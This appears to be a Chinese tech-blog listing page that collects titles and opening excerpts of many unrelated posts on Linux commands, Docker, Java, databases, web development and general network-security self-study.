目录一：x86-64处理器架构二：Intel80386处理器（i386）1.i3862.i686三：嵌入式Linux知识：1.MinGW2.GNU计划2.1GNU工具链概述此次只分享英特尔和ADM处理器有关于x86的架构，至于嵌入式处理器架构请查看https://en.wikipedia.org/wiki/List_of_ARM_processors一：x86-64处理器架构x86-64，也称为x
为千佩蓉：为家庭放弃事业的男人没出息吗？北京朵多教育
为家庭放弃事业的男人没出息吗我们在搭档的过程中会遇到一些问题，因此要做好心理准备，这样才不会陷入抱怨或双输的局面。关键不是谁比谁能力强，而是夫妻之间如何取长补短。家庭要赢需要每个人的付出和牺牲，大家一起分担和负责，这样才能享受相爱的自由、安全和归属感。我们需要做的牺牲包括自己的时间、自己的一些爱好，甚至事业发展。为千认为做好父亲是非常重要的事，所以他不仅要出席在孩子们的生活中，还要积极地参与和带领
yarn的安装和使用全网最详细教程 zxj19880502 yarn npm
一、yarn的简介：Yarn是facebook发布的一款取代npm的包管理工具。二、yarn的特点：速度超快。Yarn缓存了每个下载过的包，所以再次使用时无需重复下载。同时利用并行下载以最大化资源利用率，因此安装速度更快。超级安全。在执行代码之前，Yarn会通过算法校验每个安装包的完整性。超级可靠。使用详细、简洁的锁文件格式和明确的安装算法，Yarn能够保证在不同系统上无差异的工作。三、yarn的
请简单介绍一下Shiro框架是什么？Shiro在Java安全领域的主要作用是什么？Shiro主要提供了哪些安全功能？ AaronWang94 shiro java java 安全开发语言
请简单介绍一下Shiro框架是什么？Shiro框架是一个强大且灵活的开源安全框架，为Java应用程序提供了全面的安全解决方案。它主要用于身份验证、授权、加密和会话管理等功能，可以轻松地集成到任何JavaWeb应用程序中，并提供了易于理解和使用的API，使开发人员能够快速实现安全特性。Shiro的核心组件包括Subject、SecurityManager和Realms。Subject代表了当前与应用
linux基础命令（一）运维搬运工 linux linux 服务器 centos
Linux基础命令1、设置主机名1.1、hostname查看主机名[root@ansible~]#cat/etc/hostnameansible或[root@ansible~]#hostnameansible注意：主机名中不允许使用下划线“_”，可以用短横线“-”1.2、hostname临时修改主机名#临时修改直接修改的是内存中的，重启会失效[root@ansible~]#hostnameansi
docker基础（一）运维搬运工容器-docker docker 容器运维
相关概念介绍Docker是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖到一个可移植的容器中，然后发布到任何流行的linux机器上，也可以实现虚拟化，容器是完全使用沙箱机制，互相之间不会有任何接口。Docker有几个重要概念：dockerfile，配置文件，用来生成dockerimagedockerimage，交付部署的最小单元docker命令与API，定义命令与接口，支持第三方系统集
网络安全（黑客）——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
黑客（网络安全）技术自学30天一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
2.5 项目讲解流程王守谦26 项目资料数据库
一、项目讲解1、自我介绍2、项目流程-===============================二、自我介绍（一）、学员自我介绍，讲解存在的问题比如：讲解年份、卡顿、重点学历、忘记（二）自我规则内容1、开场白：礼貌用语2、时间：自我介绍1-2分钟以内3、内容：姓名、籍贯、毕业院校、（拉进面试官距离）4、技能：功能测试、接口测试、自动化测试、app测试、性能测试、安全测试黑盒测试、白盒测试、灰盒
linux安装docker及docker-compose 部署spring boot项目时而有事儿 docker linux docker linux spring boot
linux系统环境：centos5.14本篇描述的是在centos系统版本下安装docker，如果是ubuntu版本，请看这篇文章：linuxubuntu20安装docker和docker-compose-CSDN博客正文：安装docker和docker-compose安装docker---------运行命名等待安装完成遇到选择直接输入yyuminstall-yyum-utilsdevice-m
物联网边缘网关有哪些优势？-天拓四方北京天拓四方科技股份有限公司物联网其他边缘计算
随着物联网技术的快速发展，越来越多的设备接入网络，数据交互日益频繁，对数据处理和传输的要求也越来越高。在这样的背景下，物联网边缘网关应运而生，以其低延迟、减少带宽消耗、提高数据质量和安全性等优势，为物联网应用提供了强大的支持。物联网边缘网关的应用场景广泛，几乎涵盖了所有需要实时数据处理和传输的领域。在工业场景中，边缘计算网关可以实时处理海量传感器和设备的数据，实现对运行、制造过程的全环节实时监控、
检测usb口HotPlug-netlink cany1000 linux
为了完成内核空间与用户空间通信，Linux提供了基于Socket的NetLink通信机制。SELinux，Linux系统的防火墙分为内核态的netfilter和用户态的iptables，netfilter与iptables的数据交换就是通过Netlink机制完成。下面看一个检测usb口的例子：s32InitUsbHotPlug(void){s32nSockFd=0;//套接字地址structsoc
Linux学习系列之vim编辑器（一） llibertyll linux 学习
vi编辑器的操作模式输入模式—aio等—>命令模式<—：键—末行模式从输入/末行模式切换到命令模式都是需要按ESC键注:a光标后输入，i光标前输入，o直接向下加一行输入，O向上加一行输入在vi编辑器中光标的移动（命令行模式下）键组合（命令）光标的移动$光标移动到当前行的结尾0（零）光标移动到当前行的开始GG光标移动到最后一行gg光标移动到第一行在命令行模式下删除与复制的操作键组合（命令）含义dd删
Android 系统应用 pk8签名文件转jks或keystore教程蜗牛、Z AOSP android Framework android aosp 系统应用开发
一、介绍签名文件对于我们在做应用开发中，经常遇到，且签名文件不仅仅是保护应用安全，还会涉及到应用与底层之间的数据共享和API文件等问题。在Android中，签名文件同样也存在这个问题。但是android中又区分系统应用和普通应用。系统应用可以通过android:sharedUserId="android.uid.system"同享系统uid，可以获取更高的权限。所以在做系统应用开发的时候，经常需要
自学黑客（网络安全）技术——2024最新九九归二 web安全安全学习笔记网络网络安全信息安全
01什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。02怎样规划网络安全如果你是一
Azkaban各种类型的Job编写 __元昊__
一、概述原生的Azkaban支持的plugin类型有以下这些：command：Linuxshell命令行任务gobblin：通用数据采集工具hadoopJava：运行hadoopMR任务java：原生java任务hive：支持执行hiveSQLpig：pig脚本任务spark：spark任务hdfsToTeradata：把数据从hdfs导入TeradatateradataToHdfs：把数据从Te
Linux初学（十）shell脚本王依硕 Linux linux 运维服务器
一、for循环1.1循环的格式for变量in列表do代码代码....done循环的逻辑：将列表中的每个元素逐一赋值给变量每赋值一次，do和done之间的代码就会执行一次1.2列表的生成方式方法1：直接给出列表元素【用空格分隔多个元素】133129hahabaidu方法2：用通配符来生成元素/home/a*方法3：用命令来生成元素ls/etc/方法4：用{}展开的形式生成元素{3..7}{a..e}
计算机常用端口号王依硕 linux 服务器 ssh
ftp：（20端口）用于ftp服务，用于数据传输。ftp：（21端口）用于文件上传和下载。ssh：（22端口）用于安全Shell访问和文件传输。telnet：（23端口）用于远程命令行计算机管理。smtp：（25端口）用于发送电子邮件。dns：（53端口）用于域名解析。dhcp：（67和68端口）用于动态分配IP地址和配置网络参数。tftp：（69端口）使用udp连接。finger：（79端口）是
php 快速入门（六）王依硕 PHP php 开发语言
一、前后台交互1.1$_GET用来获取浏览器通过GET方法提交的数据GET方法它是通过把参数数据加在提交表单的action属性所指的URL中，值和表单内每个字段一一对应，然后在URL中可以看到，但是有如下缺点1.安全性不好，在URL中可以看得到2.传送数据量较小，不能大于2KB1.2$_POST用来获取浏览器通过POST方法提交的数据。POST方法它是通过HTTPPOST机制，将表单的各个字段放置
Ubuntu下安装Chrome浏览器(简单,使用) Starry-sky(jing) [linux操作系统笔记]chrome 深度学习 linux
下载安装GoogleChrome浏览器deb包极速下载:下载链接32位wgethttps://dl.google.com/linux/direct/google-chrome-stable_current_i386.deb64位wgethttps://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb安装sudodpk
【Linux】PyCharm无法启动报错及解决方法不是AI python 软件操作 Linux linux pycharm 运维
一、问题描述如图，笔者试图在Ubuntu18.04虚拟机上运行PyCharm开发工具（已安装，安装过程可以参考我的博客Ubuntu安装PyCharm），无法启动，报错：CannotconnecttoalreadyrunningIDEinstance.Exception:Process2574isstillrunning.报错截图如下：二、解决方法通过报错信息看出，出于某种原因，进程（PID为257
Linux（centos7）部署hive 灯下夜无眠 Linux linux hive 运维 dbeaver hive客户端
前提环境：已部署完hadoop(HDFS、MapReduce、YARN)1、安装元数据服务MySQL切换root用户#更新密钥rpm--importhttps://repo.mysql.com/RPM-GPG-KEY-mysqL-2022#安装Mysqlyum库rpm-Uvhhttp://repo.mysql.com//mysql57-community-release-el7-7.noarch.
Linux通过Tuned实现动态调优系统性能星河_赵梓宇 linux 运维服务器
Linux通过Tuned实现动态调优系统性能Tuned简介对于普通用户来说，优化Linux应用环境可能是相当具有挑战性的。它涵盖了各种领域，并且有许多参数需要考虑，比如CPU、存储、缓存策略和内存管理。尽管Linux有默认设置可以处理大多数情况和场景，但是对于高性能、高并发和高可用性系统等特殊场景，需要进行调整。本文讨论的特性是tuned，它是Linux系统中常用的一种调优服务。tuned由两个程
GROM学习码小白l golang
什么是GROMGo语言ORM（对象关系映射）库，它提供了一种高效、简洁的方式来操作数据库。通过将数据库表映射为Go语言的结构体，GORM让数据库操作变得更加直观和类型安全。GORM支持主流的数据库系统，包括MySQL、PostgreSQL、SQLite和SQLServer等GORM提供了一系列的API来操作MySQL数据库。以下是一些常用的GORMAPI操作，以及它们在操作MySQL时的用法：安装
山东省大数据局副局长禹金涛一行莅临聚合数据走访调研聚合数据 API 大数据人工智能 API
3月19日，山东省大数据局党组成员、副局长禹金涛莅临聚合数据展开考察调研。山东省大数据局数据应用管理与安全处处长杨峰，副处长都海明参加调研，苏州市大数据局副局长汤晶陪同。聚合数据董事长左磊等人接待来访。调研组一行参观了聚合数据展厅，了解了聚合数据的发展历程、数据产品、应用案例、奖项荣誉等情况。并就企业在数据处理和应用方面取得的成绩进行了深入交流。作为最早一批进入大数据行业的企业，聚合数据深耕行业十
vscode配置go远程linux gdut17 golang
Toolsenvironment:GOPATH=/root/goInstalling9toolsat/root/go/bininmodulemode.gopkgsgo-outlinegotestsgomodifytagsimplgoplaydlvgolintgoplsInstallinggithub.com/uudashr/gopkgs/v2/cmd/gopkgs(/root/go/bin/gop
部署es集群 liushaojiax elasticsearch java 大数据
我们会在单机上利用docker容器运行多个es实例来模拟es集群。不过生产环境推荐大家每一台服务节点仅部署一个es的实例。部署es集群可以直接使用docker-compose来完成，但这要求你的Linux虚拟机至少有4G的内存空间创建es集群首先编写一个docker-compose文件，内容如下：version:'2.2'services:es01:image:elasticsearch:7.12
apache 安装linux windows 墙头上一根草 apache inux windows
linux安装Apache 有两种方式一种是手动安装通过二进制的文件进行安装，另外一种就是通过yum 安装，此中安装方式，需要物理机联网。以下分别介绍两种的安装方式通过二进制文件安装Apache需要的软件有apr,apr-util,pcre 1，安装 apr 下载地址：htt
fill_parent、wrap_content和match_parent的区别 Cb123456 match_parent fill_parent
fill_parent、wrap_content和match_parent的区别: 1）fill_parent 设置一个构件的布局为fill_parent将强制性地使构件扩展，以填充布局单元内尽可能多的空间。这跟Windows控件的dockstyle属性大体一致。设置一个顶部布局或控件为fill_parent将强制性让它布满整个屏幕。 2） wrap_conte
网页自适应设计天子之骄 html css 响应式设计页面自适应
网页自适应设计网页对浏览器窗口的自适应支持变得越来越重要了。自适应响应设计更是异常火爆。再加上移动端的崛起，更是如日中天。以前为了适应不同屏幕分布率和浏览器窗口的扩大和缩小，需要设计几套css样式，用js脚本判断窗口大小，选择加载。结构臃肿，加载负担较大。现笔者经过一定时间的学习，有所心得，故分享于此，加强交流，共同进步。同时希望对大家有所
[sql server] 分组取最大最小常用sql 一炮送你回车库 SQL Server
--分组取最大最小常用sql--测试环境if OBJECT_ID('tb') is not null drop table tb;gocreate table tb( col1 int, col2 int, Fcount int)insert into tbselect 11,20,1 union allselect 11,22,1 union allselect 1
ImageIO写图片输出到硬盘 3213213333332132 java image
package awt; import java.awt.Color; import java.awt.Font; import java.awt.Graphics; import java.awt.image.BufferedImage; import java.io.File; import java.io.IOException; import javax.imagei
自己的String动态数组宝剑锋梅花香 java 动态数组数组
数组还是好说，学过一两门编程语言的就知道，需要注意的是数组声明时需要把大小给它定下来，比如声明一个字符串类型的数组：String str[]=new String[10]; 但是问题就来了，每次都是大小确定的数组，我需要数组大小不固定随时变化怎么办呢？动态数组就这样应运而生，龙哥给我们讲的是自己用代码写动态数组，并非用的ArrayList 看看字符
pinyin4j工具类 darkranger .net
pinyin4j工具类Java工具类 2010-04-24 00:47:00 阅读69 评论0 字号：大中小引入pinyin4j-2.5.0.jar包: pinyin4j是一个功能强悍的汉语拼音工具包，主要是从汉语获取各种格式和需求的拼音，功能强悍，下面看看如何使用pinyin4j。本人以前用AscII编码提取工具，效果不理想，现在用pinyin4j简单实现了一个。功能还不是很完美，
StarUML学习笔记----基本概念 aijuans UML建模
介绍StarUML的基本概念，这些都是有效运用StarUML?所需要的。包括对模型、视图、图、项目、单元、方法、框架、模型块及其差异以及UML轮廓。模型、视与图（Model, View and Diagram） &
Activiti最终总结 avords Activiti id 工作流
1、流程定义ID：ProcessDefinitionId，当定义一个流程就会产生。 2、流程实例ID：ProcessInstanceId，当开始一个具体的流程时就会产生，也就是不同的流程实例ID可能有相同的流程定义ID。 3、TaskId，每一个userTask都会有一个Id这个是存在于流程实例上的。 4、TaskDefinitionKey和（ActivityImpl activityId
从省市区多重级联想到的，react和jquery的差别 bee1314 jquery UI react
在我们的前端项目里经常会用到级联的select，比如省市区这样。通常这种级联大多是动态的。比如先加载了省，点击省加载市，点击市加载区。然后数据通常ajax返回。如果没有数据则说明到了叶子节点。针对这种场景，如果我们使用jquery来实现，要考虑很多的问题，数据部分，以及大量的dom操作。比如这个页面上显示了某个区，这时候我切换省，要把市重新初始化数据，然后区域的部分要从页面
Eclipse快捷键大全 bijian1013 java eclipse 快捷键
Ctrl+1 快速修复(最经典的快捷键,就不用多说了)Ctrl+D: 删除当前行 Ctrl+Alt+↓ 复制当前行到下一行(复制增加)Ctrl+Alt+↑ 复制当前行到上一行(复制增加)Alt+↓ 当前行和下面一行交互位置(特别实用,可以省去先剪切,再粘贴了)Alt+↑ 当前行和上面一行交互位置(同上)Alt+← 前一个编辑的页面Alt+→ 下一个编辑的页面(当然是针对上面那条来说了)Alt+En
js 笔记函数征客丶 JavaScript
一、函数的使用 1.1、定义函数变量 var vName = funcation(params){ } 1.2、函数的调用函数变量的调用： vName(params); 函数定义时自发调用：(function(params){})(params); 1.3、函数中变量赋值 var a = 'a'; var ff
【Scala四】分析Spark源代码总结的Scala语法二 bit1129 scala
1. Some操作在下面的代码中，使用了Some操作：if (self.partitioner == Some(partitioner))，那么Some(partitioner)表示什么含义？首先partitioner是方法combineByKey传入的变量， Some的文档说明： /** Class `Some[A]` represents existin
java 匿名内部类 BlueSkator java匿名内部类
组合优先于继承 Java的匿名类，就是提供了一个快捷方便的手段，令继承关系可以方便地变成组合关系继承只有一个时候才能用，当你要求子类的实例可以替代父类实例的位置时才可以用继承。在Java中内部类主要分为成员内部类、局部内部类、匿名内部类、静态内部类。内部类不是很好理解，但说白了其实也就是一个类中还包含着另外一个类如同一个人是由大脑、肢体、器官等身体结果组成，而内部类相
盗版win装在MAC有害发热，苹果的东西不值得买，win应该不用 ljy325 游戏 apple windows XP OS
Mac mini 型号: MC270CH-A RMB:5,688 Apple 对windows的产品支持不好,有以下问题: 1.装完了xp,发现机身很热虽然没有运行任何程序！貌似显卡跑游戏发热一样，按照那样的发热量,那部机子损耗很大,使用寿命受到严重的影响! 2.反观安装了Mac os的展示机，发热量很小，运行了1天温度也没有那么高 &nbs
读《研磨设计模式》-代码笔记-生成器模式-Builder bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ /** * 生成器模式的意图在于将一个复杂的构建与其表示相分离，使得同样的构建过程可以创建不同的表示（GoF） * 个人理解： * 构建一个复杂的对象，对于创建者（Builder）来说，一是要有数据来源(rawData)，二是要返回构
JIRA与SVN插件安装 chenyu19891124 SVN jira
JIRA安装好后提交代码并要显示在JIRA上，这得需要用SVN的插件才能看见开发人员提交的代码。 1.下载svn与jira插件安装包，解压后在安装包(atlassian-jira-subversion-plugin-0.10.1) 2.解压出来的包里下的lib文件夹下的jar拷贝到(C:\Program Files\Atlassian\JIRA 4.3.4\atlassian-jira\WEB
常用数学思想方法 comsci 工作
对于搞工程和技术的朋友来讲，在工作中常常遇到一些实际问题，而采用常规的思维方式无法很好的解决这些问题，那么这个时候我们就需要用数学语言和数学工具，而使用数学工具的前提却是用数学思想的方法来描述问题。。下面转帖几种常用的数学思想方法，仅供学习和参考函数思想　　把某一数学问题用函数表示出来，并且利用函数探究这个问题的一般规律。这是最基本、最常用的数学方法
pl/sql集合类型 daizj oracle 集合 type pl/sql
--集合类型 /* 单行单列的数据，使用标量变量单行多列数据，使用记录单列多行数据，使用集合（。。。） *集合：类似于数组也就是。pl/sql集合类型包括索引表（pl/sql table）、嵌套表（Nested Table）、变长数组（VARRAY）等 */ /* --集合方法 &n
[Ofbiz]ofbiz初用 dinguangx 电商 ofbiz
从github下载最新的ofbiz（截止2015-7-13），从源码进行ofbiz的试用 1. 加载测试库 ofbiz内置derby，通过下面的命令初始化测试库 ./ant load-demo (与load-seed有一些区别) 2. 启动内置tomcat ./ant start 或 ./startofbiz.sh 或 java -jar ofbiz.jar &
结构体中最后一个元素是长度为0的数组 dcj3sjt126com c gcc
在Linux源代码中，有很多的结构体最后都定义了一个元素个数为0个的数组，如/usr/include/linux/if_pppox.h中有这样一个结构体： struct pppoe_tag { __u16 tag_type; __u16 tag_len; &n
Linux cp 实现强行覆盖 dcj3sjt126com linux
发现在Fedora 10 /ubutun 里面用cp -fr src dest，即使加了-f也是不能强行覆盖的，这时怎么回事的呢？一两个文件还好说，就输几个yes吧，但是要是n多文件怎么办，那还不输死人呢？下面提供三种解决办法。方法一我们输入alias命令，看看系统给cp起了一个什么别名。 [root@localhost ~]# aliasalias cp=’cp -i’a
Memcached(一)、HelloWorld frank1234 memcached
一、简介高性能的架构离不开缓存，分布式缓存中的佼佼者当属memcached，它通过客户端将不同的key hash到不同的memcached服务器中，而获取的时候也到相同的服务器中获取，由于不需要做集群同步，也就省去了集群间同步的开销和延迟，所以它相对于ehcache等缓存来说能更好的支持分布式应用，具有更强的横向伸缩能力。二、客户端选择一个memcached客户端，我这里用的是memc
Search in Rotated Sorted Array II hcx2013 search
Follow up for "Search in Rotated Sorted Array":What if duplicates are allowed? Would this affect the run-time complexity? How and why? Write a function to determine if a given ta
Spring4新特性——更好的Java泛型操作API jinnianshilongnian spring4 generic type
Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API Spring4新
CentOS安装JDK liuxingguome centos
1、行卸载原来的： [root@localhost opt]# rpm -qa | grep java tzdata-java-2014g-1.el6.noarch java-1.7.0-openjdk-1.7.0.65-2.5.1.2.el6_5.x86_64 java-1.6.0-openjdk-1.6.0.0-11.1.13.4.el6.x86_64 [root@localhost
二分搜索专题2-在有序二维数组中搜索一个元素 OpenMind 二维数组算法二分搜索
1,设二维数组p的每行每列都按照下标递增的顺序递增。用数学语言描述如下：p满足 (1),对任意的x1，x2，y，如果x1<x2,则p(x1,y)<p(x2,y); (2),对任意的x，y1,y2, 如果y1<y2,则p(x,y1)<p(x,y2); 2,问题：给定满足1的数组p和一个整数k，求是否存在x0,y0使得p(x0,y0)=k? 3,算法分析： (
java 随机数 Math与Random SaraWon java Math Random
今天需要在程序中产生随机数，知道有两种方法可以使用，但是使用Math和Random的区别还不是特别清楚，看到一篇文章是关于的，觉得写的还挺不错的，原文地址是 http://www.oschina.net/question/157182_45274?sort=default&p=1#answers 产生1到10之间的随机数的两种实现方式： //Math Math.roun
oracle创建表空间 tugn oracle
create temporary tablespace TXSJ_TEMP tempfile 'E:\Oracle\oradata\TXSJ_TEMP.dbf' size 32m autoextend on next 32m maxsize 2048m extent m
使用Java8实现自己的个性化搜索引擎 yangshangchuan java superword 搜索引擎 java8 全文检索
需要对249本软件著作实现句子级别全文检索，这些著作均为PDF文件，不使用现有的框架如lucene，自己实现的方法如下： 1、从PDF文件中提取文本，这里的重点是如何最大可能地还原文本。提取之后的文本，一个句子一行保存为文本文件。 2、将所有文本文件合并为一个单一的文本文件，这样，每一个句子就有一个唯一行号。 3、对每一行文本进行分词，建立倒排表，倒排表的格式为：词=包含该词的总行数N=行号